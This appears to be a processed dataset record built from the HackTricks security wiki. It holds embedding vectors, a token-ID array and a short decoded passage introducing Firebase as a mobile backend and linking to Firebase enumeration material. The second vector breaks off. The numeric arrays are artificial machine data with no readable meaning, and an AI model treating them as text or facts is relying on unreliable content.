[ -0.19577248394489288, -0.02470415271818638, -0.8547231554985046, 0.2546224296092987, -0.5767610669136047, 0.7539216876029968, 0.061327990144491196, 0.06882847845554352, 1.1030168533325195, 0.9807435274124146, -0.2763606905937195, 0.18324950337409973, 0.8505054116249084, -0.1390906274318695, -0.14201998710632324, -0.05840231850743294, -0.205108180642128, -0.09326351433992386, -0.9163766503334045, 0.45136934518814087, 0.4357689917087555, 0.5059886574745178, -1.5619651079177856, 0.11127416044473648, -0.7927010655403137, 0.2752148509025574, -0.03847503662109375, -0.575405478477478, 0.9670283794403076, 0.46172258257865906, -0.6632270216941833, -0.1604355126619339, 0.014582743868231773, 0.01231206115335226, 0.11515244841575623, -0.7804170250892639, 0.2844621539115906, 0.26826682686805725, -0.08479534834623337, -0.5678167343139648, 0.12627318501472473, -0.05384466424584389, 0.5096204876899719, -1.0053164958953857, -0.7324287295341492, -0.4134625494480133, -0.5072885751724243, -0.16699610650539398, -0.19986426830291748, -0.13637563586235046, -0.0753287598490715, 0.8374165296554565, 0.10839782655239105, 0.1320563703775406, -0.38844430446624756, 0.06400515139102936, -0.4042311906814575, -0.618423581123352, -0.6951892375946045, -0.22368954122066498, -0.272157222032547, 0.3746010363101959, 0.542441725730896, -0.6810319423675537, 0.6394745111465454, 0.6101619601249695, 0.16361892223358154, -0.7404140830039978, -0.45297396183013916, 0.19060930609703064, -0.6871620416641235, 0.4675103425979614, -0.5946739315986633, -1.4156029224395752, -1.2482881546020508, 0.1513768583536148, -0.3001168668270111, 0.8733950257301331, 0.18771973252296448, 1.049113392829895, -0.15054012835025787, 0.9026305675506592, -0.2565656304359436, -0.08749089390039444, -1.2376174926757812, 0.09522677958011627, 0.5710583329200745, -0.29769569635391235, -0.37832194566726685, 0.19694814085960388, -0.49010875821113586, 0.6007846593856812, -0.2127801775932312, 0.5031718611717224, 0.5819383859634399, 0.5037369728088379, -0.24222472310066223, 0.2676411271095276, 0.1634160727262497, 0.45823541283607483, 0.43881136178970337, 0.7271134853363037, -0.5620966553688049, -0.060493387281894684, -0.21909691393375397, 0.37029561400413513, 0.39159300923347473, -0.24644310772418976, -1.109739065170288, -1.166193962097168, 0.327341228723526, 0.1382284015417099, -0.08201228082180023, -0.19678452610969543, 0.04680170491337776, 0.08307091891765594, -0.37935885787010193, 0.6725473999977112, -0.09696543961763382, -0.29191434383392334, 0.45997512340545654, -0.3428073227405548, -0.017146050930023193, -0.40639567375183105, 0.060676105320453644, 0.7097565531730652, -0.12550286948680878, 0.3437967002391815, 0.2579393982887268, -0.13982440531253815, -0.23762956261634827, 0.26656660437583923, 0.2864544987678528, 0.62601637840271, -0.28936469554901123, -0.16431979835033417, 0.18953962624073029, -0.5854924321174622, 0.3327970802783966, -0.3577736020088196, -0.02088446542620659, 0.10644765943288803, -0.5674744248390198, 0.9652125835418701, 0.5814265608787537, -0.22809748351573944, -0.3751804530620575, 0.1857651174068451, -0.4665655195713043, 0.47611004114151, -0.08064667880535126, -0.40920698642730713, 0.5808501839637756, 0.00361731369048357, -0.0186940785497427, -0.1494196057319641, -0.27027037739753723, 0.631710946559906, 0.9540497660636902, 0.49257782101631165, -0.259512722492218, 1.1449812650680542, -0.5283029675483704, 0.7086373567581177, -0.32152119278907776, 0.7327325940132141, -0.14942775666713715, -0.6120203137397766, 0.28062012791633606, -0.7901843190193176, 0.1507190614938736, 0.8992632031440735, -0.007337371353060007, 0.11423362046480179, 1.2170549631118774, -0.42025071382522583, 0.31957167387008667, -0.5733695030212402, 0.07774961739778519, 0.47370970249176025, -0.4562319815158844, 0.8640650510787964, 1.0267770290374756, 0.09937730431556702, -0.330605149269104, 0.39417076110839844, -0.5018849968910217, -0.2877829968929291, -0.582984447479248, -0.029329579323530197, 0.5434101819992065, 0.3500462770462036, -0.735289454460144, 0.18019263446331024, -0.5973210334777832, -0.1468285620212555, -1.1004902124404907, -0.02796684019267559, -0.6309391260147095, -1.2365610599517822, 0.2599477767944336, 0.41211459040641785, -0.4439041018486023, 0.16478599607944489, -0.2204885184764862, -0.5504109859466553, 0.5601993799209595, 0.5216538906097412, -0.44561678171157837, 0.26902517676353455, 0.2653614580631256, 0.30536308884620667, -0.870009183883667, 0.21821220219135284, 0.5083433389663696, -0.6910732388496399, -0.11042215675115585, -0.043369315564632416, -0.26749178767204285, 0.5749524235725403, 0.603378415107727, 0.5123225450515747, 0.9893681406974792, 0.5443134307861328, -0.577742338180542, 0.6120398640632629, -0.10086847096681595, -0.3487984240055084, -0.18652839958667755, -0.13539153337478638, 0.015320567414164543, 0.8870636224746704, -0.11412794142961502, 0.7200964093208313, 0.0018176042940467596, 0.2027507871389389, -0.07681574672460556, -0.18499116599559784, 0.29052749276161194, 0.35528528690338135, 0.004504560027271509, 0.3322124183177948, 0.2550389766693115, 0.3797321319580078, 0.032222118228673935, -0.3704933226108551, 0.15671087801456451, 0.03162868320941925, -0.1725279539823532, 0.04606396704912186, -0.5140635371208191, 0.9061545133590698, 0.3072560727596283, -0.14902745187282562, -0.597705602645874, -0.4451332688331604, 0.013861443847417831, 0.7842618227005005, -0.44564002752304077, 0.01969273015856743, 0.1181965321302414, 0.7899255752563477, -0.4067690074443817, -0.5083490014076233, 0.38907963037490845, 0.1153356283903122, -0.060092195868492126, -0.012635583989322186, -0.09045596420764923, -0.7158705592155457, -0.3576923608779907, -0.45285794138908386, -0.4103265106678009, 0.0765586793422699, -1.511378288269043, 0.15288029611110687, 0.6052422523498535, -1.1058592796325684, 0.5103490352630615, -0.23592250049114227, 0.9932438135147095, -0.07007528841495514, 0.1773136705160141, 0.42245158553123474, 0.5798690319061279, 0.6547132730484009, 0.017452027648687363, 0.018684174865484238, 0.26636621356010437, 0.12420834600925446, -0.9671194553375244, -0.576822817325592, -0.057601191103458405, -0.08353634923696518, 0.4195665717124939, -0.38778576254844666, 0.3513556718826294, -0.246191143989563, -0.06491530686616898, -0.0171029232442379, -0.11258555203676224, -0.25317367911338806, 0.11042629182338715, 0.6061201691627502, -0.3280279040336609, 0.4825077950954437, 0.22046582400798798, -0.15318965911865234, 0.24693959951400757, 0.6244659423828125, 0.15732716023921967, 0.03981931135058403, 0.07031212002038956, -0.10504180938005447, -0.596796989440918, 0.4882465600967407, 0.36570116877555847, -0.14287708699703217, -0.7360742092132568, 0.1426832526922226, -0.6311118006706238, -0.2838376760482788, -0.8412676453590393, -0.5992355346679688, -0.2822608947753906, 0.8199145197868347, -0.6203113794326782, -0.8583487272262573, 0.14621028304100037, -0.7389804124832153, 0.11776445806026459, -0.2059142142534256, 0.35850921273231506, 1.2665607929229736, 0.788300096988678, 0.30582404136657715, 0.2602103352546692, 0.18421955406665802, 0.2600129246711731, 0.17661699652671814, 0.49255499243736267, -0.12909895181655884, 0.6592919826507568, -0.20757737755775452, -0.018284451216459274, -0.5763250589370728, -0.058276183903217316, -1.0770012140274048, 0.5708184242248535, -0.8527967929840088, -0.8760810494422913, -0.33418577909469604, -0.28364530205726624, 0.34509095549583435, 0.8068526387214661, 0.9359327554702759, -1.1742058992385864, -0.34067437052726746, -0.5248453617095947, -0.25827330350875854, 0.4099314212799072, 0.04349944740533829, -0.2426130324602127, 0.6648386716842651, -0.22751548886299133, -0.43782687187194824, 0.5332151651382446, 0.9261292219161987, 0.30570411682128906, -0.1731523722410202, 0.3534988462924957, -0.539214551448822, -0.04640033468604088, 0.7950743436813354, -0.2985439896583557, -0.35428503155708313, 1.4247145652770996, 0.1393425315618515, 0.6049957275390625, -0.3361644744873047, -0.4048980176448822, -0.13248567283153534, 0.023158526048064232, 0.7847805023193359, -0.34634092450141907, -0.31608518958091736, 0.6236721277236938, 0.3088928461074829, -0.18860848248004913, -0.2723497748374939, 0.14973486959934235, 0.2705698311328888, 1.0011411905288696, 0.04944149777293205, -1.155871868133545, -0.7444956302642822, -0.1971818506717682, 0.13102789223194122, 0.3052721917629242, 0.09003414213657379, -0.018320394679903984, -0.20385614037513733, 0.1881210058927536, 0.051433246582746506, -0.2581841051578522, -0.06639160960912704, -0.21024814248085022, 0.45683959126472473, 0.17480036616325378, 0.3724072575569153, 0.046199556440114975, -0.40385428071022034, -0.4643731415271759, -0.24975073337554932, 0.004429485183209181, 0.045247986912727356, -0.32909485697746277, 0.5283275246620178, 0.4907185137271881, 0.026667466387152672, -0.03070935048162937, -0.49725019931793213, -0.36761629581451416, -0.31659018993377686, 0.5332509279251099, -0.24323001503944397, -0.4317549765110016, -0.5481787919998169, -0.02028774842619896, -0.04827852174639702, 0.05663162097334862, -0.6544209718704224, -1.0607651472091675, -0.48127081990242004, -1.223360300064087, 0.49500924348831177, 1.2879962921142578, 0.2587246000766754, -0.3717215955257416, -0.3680512011051178, -0.4333338737487793, 0.8313093185424805, -0.19725796580314636, -0.10843551158905029, -0.0967039167881012, 0.6804789900779724, 0.26051145792007446, 0.0764336884021759, -0.27925795316696167, 0.46304231882095337, 0.4321782886981964, -0.9228731393814087, 1.1329535245895386, -0.33780455589294434, -0.3570241928100586, -0.45669814944267273, 0.5841426849365234, -0.06635767966508865, 0.6394423246383667, 0.18658378720283508, -0.012648511677980423, 0.03629321604967117, -0.34683117270469666, -0.4318043291568756, -0.1810699999332428, 0.6696087718009949, -0.3124274015426636, 0.31119030714035034, 0.6831685900688171, 0.8314753174781799, 0.07925385236740112, 1.1170161962509155, 0.08999726921319962, -0.6055270433425903, 0.11003801226615906, -0.3673175871372223, 0.47544848918914795, 0.08171667903661728, -0.30800819396972656, 0.30315685272216797, -1.1076058149337769, 0.577264666557312, 0.06668271124362946, 0.29362478852272034, -0.313351571559906, -0.5003432631492615, -0.12036130577325821, 0.3552871346473694, 0.22869762778282166, 0.6915691494941711, -0.05104472488164902, -0.07838127762079239, -0.22428680956363678, -0.2140302062034607, -0.39759892225265503, -0.046791136264801025, 0.06884094327688217, -0.11336313188076019, 0.21509912610054016, 0.10198130458593369, 0.8013888597488403, -0.05576431006193161, -1.0610501766204834, 0.5342545509338379, 0.05807604640722275, 0.2278280258178711, -0.4883502721786499, 0.23840638995170593, -0.5624204874038696, -0.3685120940208435, -0.03934549167752266, 0.5733818411827087, -0.22493043541908264, 0.006905458867549896, 0.6596739292144775, 0.5945866703987122, -0.1386108249425888, 0.21348130702972412, -0.2669346034526825, 0.1693258434534073, 0.5912705063819885, -0.5216168761253357, -0.6527721881866455, 0.0807875394821167, -0.06215338408946991, 0.1738283336162567, 0.8447337746620178, -0.7978816628456116, -0.4690140187740326, 0.1846662312746048, 0.3703336715698242, -0.3311808407306671, -0.26956576108932495, 0.06982548534870148, -0.0829465314745903, -0.7765363454818726, 0.9996780753135681, -0.5589789152145386, -0.26258233189582825, 0.0231491532176733, -0.15282990038394928, -0.12383194267749786, -0.7400930523872375, -0.002895086072385311, 0.23284640908241272, -0.3030111491680145, 0.11025682091712952, 0.361885130405426, 0.11802908778190613, 0.5624781250953674, -0.03505391255021095, 0.18553169071674347, 0.03901945427060127, 0.14278051257133484, -0.14838406443595886, -0.8301271200180054, -0.12105406820774078, 0.07414859533309937, -0.3713388442993164, 0.24574464559555054, -0.5445038676261902, 0.010022265836596489, -0.4320034086704254, 0.9625563025474548, -0.9088258147239685, 0.8519757390022278, -0.37964901328086853, 0.23522599041461945, -0.2942388951778412, -0.15039114654064178, 0.4211065173149109, 0.12243109196424484, 0.5262994170188904, -0.510463297367096, -0.2193870097398758, -0.40588250756263733, 0.5491982698440552, -0.4284271001815796, -0.5190134048461914, 0.4416859745979309, -0.25571975111961365, 0.0027925532776862383, -0.4133424758911133, -1.0511407852172852, 0.47045519948005676, -0.37138235569000244, -0.014441384002566338, 0.3313135802745819, 0.16102518141269684, -0.34508052468299866, -0.24188850820064545, 0.40982720255851746, 0.4100590646266937, -0.6416348814964294, -0.6446252465248108, 0.4152819514274597, 0.1544884443283081, -0.10993331670761108, -0.22714121639728546, 0.31860965490341187, -0.2729867994785309, -0.3061639368534088, 0.5777521729469299, -0.21739891171455383, 0.21631869673728943, 0.1886281967163086, -1.3679029941558838, -0.011674431152641773, 0.3729749917984009, 0.6389275789260864, 0.0803232192993164, 0.775409996509552, 0.3433922827243805, 0.5210356712341309, 1.3291603326797485, -0.7091020941734314, -0.24395282566547394, -0.09297165274620056, 0.04496486857533455, -0.46626877784729004, -0.6658461093902588, 0.11978259682655334, -0.40365245938301086, -0.5511929988861084, -0.7782033085823059, -0.21628057956695557, 0.188394695520401, 0.14218448102474213, 0.21752001345157623, -0.6164418458938599, -0.6721919178962708, -0.13438278436660767, -0.0985829159617424, 0.4017961025238037, 0.49499452114105225, 0.16623035073280334, -0.0951160341501236, -0.1549738496541977, 0.30944517254829407, 0.375458687543869, 0.5353172421455383, -0.124839186668396, -0.25151902437210083, -1.1857774257659912, -0.15225522220134735, -0.3524107336997986, -0.12762798368930817, 0.7261293530464172, -0.6960835456848145, 0.20865613222122192, 0.26674309372901917, 0.4108024537563324, 1.231055498123169, 0.3097239136695862, 0.5752292275428772, 0.7347506880760193, -0.11392119526863098, -1.0269774198532104, 0.2061685472726822, -0.24215568602085114, 0.16352416574954987, -0.3855661153793335, -0.169517382979393, 0.4563390016555786, 0.11474411189556122, 0.2520907521247864, -0.08544531464576721, -0.04220997914671898, -0.2049461007118225, -0.20568399131298065, 0.3717438280582428, 0.36017897725105286, 0.3611460328102112, 0.5749455690383911, -0.09475502371788025, -0.6208236813545227, -0.8071358799934387, -0.29622992873191833, 0.1067090630531311, -0.11551487445831299, -0.17444083094596863, -0.3821449279785156, -0.3661207854747772, -0.2828262746334076, -0.6179097890853882, -1.0373812913894653, -0.16773036122322083, 0.014595738612115383, -0.7512291073799133, -0.20276324450969696, -0.5004182457923889, -0.7464557886123657, 0.6784051060676575, -0.6392606496810913, 0.9911731481552124, -0.3425249755382538, -0.7387555241584778, 0.4572438597679138, -0.18436087667942047, -0.1371336281299591, 0.5885144472122192, 0.47615116834640503, -0.4519411027431488, 0.16557547450065613, -0.06152787804603577, 0.18756133317947388, 0.004260026849806309, -0.0395769365131855, 0.43162694573402405, 0.09019125998020172, -0.24273647367954254, -0.22261765599250793, 0.1803147941827774, -0.012290419079363346, 0.5328463912010193, -0.829413890838623, 0.2842769920825958, -0.05337109789252281, 0.2333700805902481, 0.07075445353984833, 0.7293676137924194, 0.031773410737514496, 0.42357540130615234, -0.11701072752475739, 0.765636146068573, 0.6189432740211487, 0.21429024636745453, 0.5124314427375793, -0.09546982496976852, 0.6801973581314087, 0.09387120604515076, 0.529710054397583, -0.21300366520881653, 0.4088917374610901, 0.11573468893766403, -0.07090777158737183, 0.5094031691551208, -0.22430990636348724, -0.10041734576225281, 0.05847063288092613, 0.30385109782218933, 0.5900002121925354, 0.7795941829681396, -0.1835549771785736, 0.2173113077878952, -0.04560520872473717, 0.8546087145805359, -0.6994215250015259, -0.5243610143661499, 0.1427786499261856, -0.8614080548286438, -0.08927056938409805, -1.1392395496368408, -0.03812797740101814, -0.40431472659111023, 0.30002111196517944, -0.6258637309074402, 0.1284913271665573, 0.6281549334526062, 1.215573787689209, 1.1528098583221436, -0.1848476678133011, -0.12328289449214935, -0.08659636229276657, 0.3808967173099518, -0.4022849202156067, -0.9884156584739685, 0.0959240049123764, 1.275543212890625, -0.08177448809146881, -0.10915813595056534, -0.7731444239616394, -0.538054347038269, 0.3202732503414154, 0.34607648849487305, -0.7473974823951721, 0.2354562133550644, -0.7325080633163452, 0.8941505551338196, -0.9564298987388611, 0.4997636377811432, -0.4782451391220093, 0.13938477635383606, 0.04121050238609314, 0.2932739853858948, 0.4763038158416748, -0.0637335255742073, 0.4370826184749603, 0.060310594737529755, 0.4738185703754425, 0.47291994094848633, 0.7193388938903809, -0.05134835094213486, -0.44330835342407227, -0.18598420917987823, 0.5096967816352844, 1.078294277191162, -0.4091586768627167, -0.15866529941558838, 0.6952700614929199, 0.49485817551612854, -0.4528842866420746, 0.10194013267755508, -0.3404513895511627, -0.4368461072444916, -0.41170594096183777, 0.7556460499763489, -0.2783048748970032, 0.3552718758583069, 0.1789882481098175, -0.3272138237953186, -0.43554094433784485, -0.5577989816665649, -0.3962657153606415, -0.24687691032886505, -0.6183101534843445, 0.8191671371459961, -0.717972993850708, 0.2478335201740265, -0.020767150446772575, 0.09725118428468704, 0.6068075299263, 0.5547073483467102, -0.9315223693847656, -0.3235301971435547, 0.46700552105903625, 0.5746161341667175, -0.4214475452899933, 0.24503393471240997, -0.2291739583015442, -0.059941839426755905, -0.28262028098106384, -0.2565803825855255, 0.08172695338726044, -0.18371103703975677, -0.1914101392030716, -0.1731542944908142, -0.4668445289134979, 0.4505058526992798, 0.35100337862968445, -0.05601789429783821, 0.4470676779747009, 0.045678652822971344, -0.39043763279914856, -0.54151850938797, -0.5133122205734253, -0.48186057806015015, -1.076309084892273, -0.18119187653064728, -0.08706381916999817, -0.9013382792472839, -0.016955586150288582, 0.012144950218498707, 0.4786089062690735, -0.7252472043037415, 0.5251173973083496, -0.39853528141975403, 0.6353082656860352, -0.051664870232343674, -0.2878296971321106, -0.6733912825584412, 0.5995686054229736, -0.5844016671180725, 0.04660392925143242, -0.29068639874458313, -0.2707209289073944, -0.8052759170532227, -0.1941702663898468, -0.019272852689027786, -0.03753279894590378, 0.15139849483966827, -0.5458477139472961, -0.679783046245575, 0.6539457440376282, -0.24884413182735443, -0.4963437616825104, 0.023160291835665703, 0.6362934708595276, -0.476648211479187, 0.03374186530709267, -0.7306827902793884, -0.05911603197455406, 0.2948102653026581, -0.0974610224366188, -0.569780170917511, 0.2872491478919983, -0.6528323292732239, -0.34382927417755127, 0.17690563201904297, 0.2852635085582733, -0.7678647041320801, -0.4743076264858246, 0.18290607631206512, -0.2154269963502884, 0.7668659090995789, 0.39135459065437317, 0.6499844193458557, 0.5254337191581726, -0.4724251627922058, 0.3277858793735504, -0.08221586793661118, 1.0327364206314087, 0.8433824181556702, 0.6481428146362305, 0.6824159622192383, -0.10832282900810242, -0.14390970766544342, 0.4294101893901825, 0.31817811727523804, 0.08021211624145508, -0.27575939893722534, -0.037808846682310104, -0.4413595199584961, -0.6669925451278687, -0.538556694984436, 0.07981343567371368, 0.035267382860183716, -1.3226817846298218, 0.01324327103793621, 0.002365772146731615, 0.11410684138536453, -0.5160747766494751, -0.7506063580513, -0.13205040991306305, 0.3311660885810852, -0.458249032497406, -1.0524559020996094, 0.4089047908782959, -1.3657722473144531, 4.293509483337402, 0.1719798892736435, -0.13271157443523407, 0.4251316785812378, 0.003465949324890971, 0.33713269233703613, 0.7034913301467896, -0.7899291515350342, -0.9057708978652954, 0.05029159039258957, 0.1352323293685913, -0.1329958438873291, 0.7080241441726685, 0.6698379516601562, -0.5555867552757263, 0.7488834857940674, -0.054650839418172836, -0.1531556397676468, 0.25492537021636963, -0.807820200920105, -0.3082640469074249, -0.07925788313150406, 0.5067852735519409, 0.25885385274887085, -0.05088846758008003, 0.3933226466178894, -0.6824536323547363, -0.3937118351459503, -0.45286568999290466, -0.7467713356018066, 0.6843167543411255, -0.014392590150237083, 1.0124986171722412, 0.0656503438949585, -0.29849007725715637, 0.516291081905365, 0.14862246811389923, -0.7572242021560669, -0.3706236481666565, 0.5266377925872803, 0.26246097683906555, -0.38266855478286743, -0.697955846786499, -0.43197038769721985, 0.654212236404419, 0.10745863616466522, -0.12867841124534607, 0.05320168659090996, 0.6664842367172241, -0.3554193377494812, 0.45848211646080017, -0.0965605080127716, 0.05589483305811882, -0.40367162227630615, -0.4388698637485504, 0.08770826458930969, -0.5407938957214355, 0.7337350249290466, -0.1898265779018402, -0.3267669081687927, 0.29683324694633484, -0.25980278849601746, -0.5614104270935059, -0.2261536568403244, -0.4371623396873474, 0.022435413673520088, 0.095204658806324, 1.2546504735946655, -0.31698453426361084, -0.8064655065536499, -0.08804414421319962, -0.5044743418693542, -0.6734382510185242, -0.48954442143440247, 0.2406969517469406, 1.1803795099258423, 0.03390108421444893, 0.5242108702659607, 0.23711571097373962, -0.531022846698761, 0.7058504223823547, 0.7173420786857605, 0.18627378344535828, 0.038576945662498474, 0.5170339941978455, 0.25114530324935913, -0.640884518623352, -0.20411475002765656, -0.48311668634414673, 0.3665701150894165, 0.606844425201416, 0.4046897292137146, -0.39671939611434937, -0.3885223865509033, 0.36554521322250366 ]
[ 1996, 4773, 8584, 2007, 1996, 18546, 9722, 5906, 1012, 1996, 5080, 3791, 2000, 2022, 7801, 2011, 1996, 7473, 1006, 3081, 18833, 1010, 2334, 7861, 20350, 1010, 2334, 2897, 1012, 1012, 1012, 1007, 1998, 2770, 1996, 2139, 8569, 23033, 3468, 4773, 8584, 1010, 2059, 3229, 18546, 1024, 1013, 1013, 22459, 1013, 1001, 5733, 1024, 7276, 22459, 1998, 1037, 2047, 3332, 2097, 2022, 2441, 1012, 1999, 2023, 3645, 2017, 2064, 11835, 2007, 1996, 4180, 1997, 1996, 4773, 8584, 1998, 2130, 2191, 2009, 15389, 15275, 1046, 2015, 3642, 2013, 1996, 10122, 21628, 1024, 1999, 2344, 2000, 9585, 4773, 8584, 6556, 2139, 8569, 12588, 2017, 2064, 2079, 2242, 2066, 1024, 2065, 1006, 3857, 1012, 2544, 1012, 17371, 2243, 1035, 20014, 1028, 1027, 3857, 1012, 2544, 1035, 9537, 1012, 8934, 24498, 1007, 1063, 4773, 8584, 1012, 2275, 8545, 9818, 28040, 7666, 3207, 8569, 12588, 8189, 23242, 1006, 2995, 1007, 1025, 1065, 2023, 4292, 12033, 2000, 2035, 1997, 1996, 4646, 1005, 1055, 4773, 8584, 2015, 1012, 4773, 8584, 2139, 8569, 12588, 2003, 2025, 5360, 2011, 1996, 2110, 1997, 1996, 2139, 8569, 23033, 3468, 5210, 1999, 1996, 4646, 1005, 1055, 19676, 1012, 2065, 2017, 2215, 2000, 9585, 4773, 8584, 2139, 8569, 12588, 2069, 2043, 2139, 8569, 23033, 3468, 2003, 2995, 1010, 3231, 1996, 5210, 2012, 2448, 7292, 1012, 2065, 1006, 3857, 1012, 2544, 1012, 17371, 2243, 1035, 20014, 1028, 1027, 3857, 1012, 2544, 1035, 9537, 1012, 8934, 24498, 1007, 1063, 2065, 1006, 1014, 999, 1027, 1006, 2131, 29098, 19341, 3508, 2378, 14876, 1006, 1007, 1012, 9245, 1004, 4646, 2378, 14876, 1012, 5210, 1035, 2139, 8569, 23033, 3468, 1007, 1007, 1063, 4773, 8584, 1012, 2275, 8545, 9818, 28040, 7666, 3207, 8569, 12588, 8189, 23242, 1006, 2995, 1007, 1025, 1065, 1065, 18093, 3366, 2595, 8873, 7096, 11657, 15275, 6764, 10755, 1060, 8093, 1027, 2047, 20950, 11039, 25856, 2890, 15500, 1006, 1007, 1025, 1060, 8093, 1012, 2006, 16416, 5149, 9153, 15007, 22043, 1027, 3853, 1006, 1007, 1063, 2065, 1006, 1060, 8093, 1012, 3201, 9153, 2618, 1027, 1027, 20950, 11039, 25856, 2890, 15500, 1012, 2589, 1007, 1063, 9499, 1006, 1060, 8093, 1012, 3433, 18209, 1007, 1025, 1065, 1065, 1060, 8093, 1012, 2330, 1006, 1005, 2131, 1005, 1010, 1005, 5371, 1024, 1013, 1013, 1013, 2951, 1013, 2951, 1013, 4012, 1012, 27280, 7011, 4014, 5397, 1012, 2073, 6491, 2100, 12618, 9333, 2121, 1013, 17881, 1013, 3565, 1035, 3595, 1012, 16962, 1005, 1010, 2995, 1007, 1025, 1060, 8093, 1012, 4604, 1006, 19701, 1007, 1025, 102 ]
hack_tricks
427.txt
4
[CLS] firebase databasewhat is firebasefirebase is a backend - as - a - services mainly for mobile application. it is focused on removing the charge of programming the back - end providing a nice sdk as well as many other interesting things that facilitates the interaction between the application and the back - end. learn more about firebase in : gcp - firebase enumhacktricks cloud [SEP]
[ -0.07566677033901215, -0.3662770688533783, -0.6819214224815369, 0.49620988965034485, 0.6777622699737549, 0.2451990842819214, -0.2954116761684418, -0.062717966735363, 0.09535647928714752, 0.44067949056625366, 0.3060775697231293, 0.003081999719142914, 0.8003565669059753, -0.5521167516708374, -0.8342399597167969, -0.08776556700468063, -1.022520899772644, 0.9219315052032471, -0.6514621376991272, -0.5406935811042786, 0.458728164434433, -0.40845736861228943, -1.3272626399993896, -0.48089492321014404, -0.9245507121086121, 1.112778902053833, -0.10026789456605911, -0.28884005546569824, 0.7483285665512085, 1.08285391330719, -0.6509436964988708, 0.23717503249645233, -0.16265138983726501, -0.796294093132019, -0.238274946808815, 0.4720962941646576, 0.18323323130607605, 0.07515101879835129, -0.7017550468444824, -0.3785665035247803, 0.3150312304496765, 0.1620701551437378, 0.8319678902626038, -1.456042766571045, -0.9322676658630371, 0.3184778690338135, -0.3858950436115265, 0.6067313551902771, 0.05989614874124527, 0.3567834198474884, 0.326485276222229, 0.36188000440597534, 0.7070250511169434, -0.7746720910072327, -0.6648563742637634, -0.2600175440311432, 0.021904658526182175, 0.40420982241630554, 0.11987553536891937, -0.2379080355167389, -0.4835674464702606, -0.3622061312198639, -0.20659147202968597, -0.9744501113891602, 0.5749718546867371, -0.41538840532302856, -0.787318766117096, -0.9116266965866089, -0.38710662722587585, -0.028335271403193474, -0.38048744201660156, 0.33975982666015625, -0.2682074010372162, -1.225459098815918, -0.17525243759155273, 0.821476936340332, 0.2910314202308655, -0.1422349214553833, 0.16470207273960114, 0.547870934009552, 0.32045599818229675, 0.9646928906440735, 0.10550741106271744, 0.4441857635974884, -0.8945187330245972, -0.41015028953552246, 0.10937533527612686, 0.16243234276771545, -0.886026918888092, -0.19612514972686768, 0.3599262833595276, 1.108582854270935, 0.671104907989502, 0.3541480600833893, -0.013835616409778595, 0.3265703022480011, 0.4571581780910492, 0.3061573803424835, 0.06333184242248535, 0.7843798398971558, 0.43875110149383545, -0.41494762897491455, -0.06514886766672134, 0.4893886148929596, -0.689063310623169, 0.007629572879523039, -0.10188326239585876, 0.10342887043952942, -0.848953127861023, -0.8429123759269714, -0.16673578321933746, -0.02939908392727375, -0.5466440916061401, -0.7429021000862122, -0.0478859506547451, 0.43073153495788574, -0.021469082683324814, 0.11168428510427475, 0.4313353896141052, -0.1446738988161087, 0.3578547537326813, 0.09239182621240616, 0.14270846545696259, -0.17639754712581635, -0.18726825714111328, 0.2123650759458542, 0.6291733980178833, 0.6813877820968628, -0.269795686006546, 0.2501427233219147, 0.22809545695781708, -0.3792204260826111, -0.3789091110229492, 0.6122696995735168, -0.7766672968864441, -0.7752069234848022, 0.4035591185092926, 1.2198199033737183, 0.27337566018104553, -0.3916130065917969, 0.2027730643749237, -0.7219395637512207, -0.05912410840392113, 1.011178970336914, -0.5190605521202087, -0.5369898676872253, -0.10332638025283813, -0.44911977648735046, -0.7423055171966553, -0.0626528263092041, -0.5107091665267944, 0.6323516368865967, 0.9933969974517822, -0.14887495338916779, 0.01676941104233265, 0.0841781347990036, -0.41319555044174194, 0.6063879728317261, 1.0968976020812988, -0.723300576210022, -0.6269914507865906, 0.2953032851219177, 0.006737659685313702, -0.2636246383190155, -0.5820927619934082, 0.2335318922996521, -0.6068493723869324, -0.4394108057022095, -0.5412735342979431, 0.15271316468715668, -0.270374059677124, 0.31179308891296387, -0.4786911606788635, 0.7694359421730042, 1.2620960474014282, 0.174033522605896, -0.15042400360107422, -0.8649274706840515, 0.27145472168922424, 0.7835230231285095, 0.4501379132270813, 0.5533443689346313, 0.28600817918777466, 0.6869664192199707, 0.4044962227344513, 0.3412168622016907, -0.9190208315849304, -0.26535505056381226, -0.32404276728630066, -0.4353947341442108, -0.19804558157920837, 0.5187708139419556, -0.5384685397148132, 0.2573084235191345, -0.08482880890369415, -0.32977592945098877, -0.9229221940040588, 0.6755149960517883, -0.2561105787754059, -1.4881305694580078, 0.04612397029995918, 0.14615745842456818, -0.3606882393360138, 0.13329166173934937, -0.08785504102706909, -0.6242113709449768, 0.18062277138233185, 1.0478984117507935, -0.4259221851825714, 0.31928226351737976, 0.2479637861251831, 0.3878367245197296, -0.16401629149913788, -0.2801077663898468, 0.6583422422409058, -0.3993469774723053, -0.7670840620994568, 0.5748241543769836, -0.996202290058136, 0.16609038412570953, -0.404065877199173, 0.3930473029613495, 0.856685221195221, 0.8518112897872925, -0.2279408574104309, 0.4244624376296997, 0.07886308431625366, 0.2490031123161316, -0.2377249300479889, -0.542587161064148, 0.26086634397506714, 1.0261154174804688, -0.2444169968366623, 0.5037487745285034, 0.489549845457077, -0.435477077960968, 0.16293175518512726, 0.6321422457695007, 0.17378491163253784, -0.11344572901725769, -0.6126667857170105, -0.46596559882164, 0.3819023072719574, 0.4538418650627136, 0.25869402289390564, -0.48416098952293396, 0.9910315871238708, 0.20208044350147247, 0.10166160762310028, 0.9228779077529907, -1.807342290878296, 0.26679667830467224, 0.2863735258579254, -0.26324260234832764, -0.10403437912464142, -0.20604857802391052, -0.38721194863319397, 0.4955562949180603, -0.9263091683387756, 0.2860763669013977, 0.09884244203567505, 0.29329028725624084, 0.4812738001346588, -0.9693925380706787, 0.41614121198654175, 0.4437568783760071, 0.23800969123840332, 0.5882720947265625, 0.2792727053165436, -0.9959215521812439, -0.48821553587913513, -0.728417694568634, 0.16831259429454803, -0.11411906033754349, -0.8807458281517029, 0.032798755913972855, 0.6036947965621948, -0.8599415421485901, 0.4414760172367096, 0.06558509916067123, 0.10343728214502335, 0.5396592020988464, -0.46832144260406494, -0.13499799370765686, 0.41567277908325195, 0.47496989369392395, -0.6570824384689331, -0.08796694129705429, 0.37263330817222595, -0.0024183138739317656, -0.028375884518027306, -0.14535236358642578, 0.32357218861579895, -0.4118368327617645, 0.2777182459831238, -1.1030192375183105, 0.3527412414550781, -0.29697227478027344, -0.47154897451400757, -0.8285876512527466, -0.35082101821899414, -0.4967615306377411, -0.4848730266094208, 0.4733079969882965, -0.5340979695320129, 0.7950654029846191, 0.7699355483055115, -0.02194277197122574, 0.17195984721183777, 0.4750736355781555, 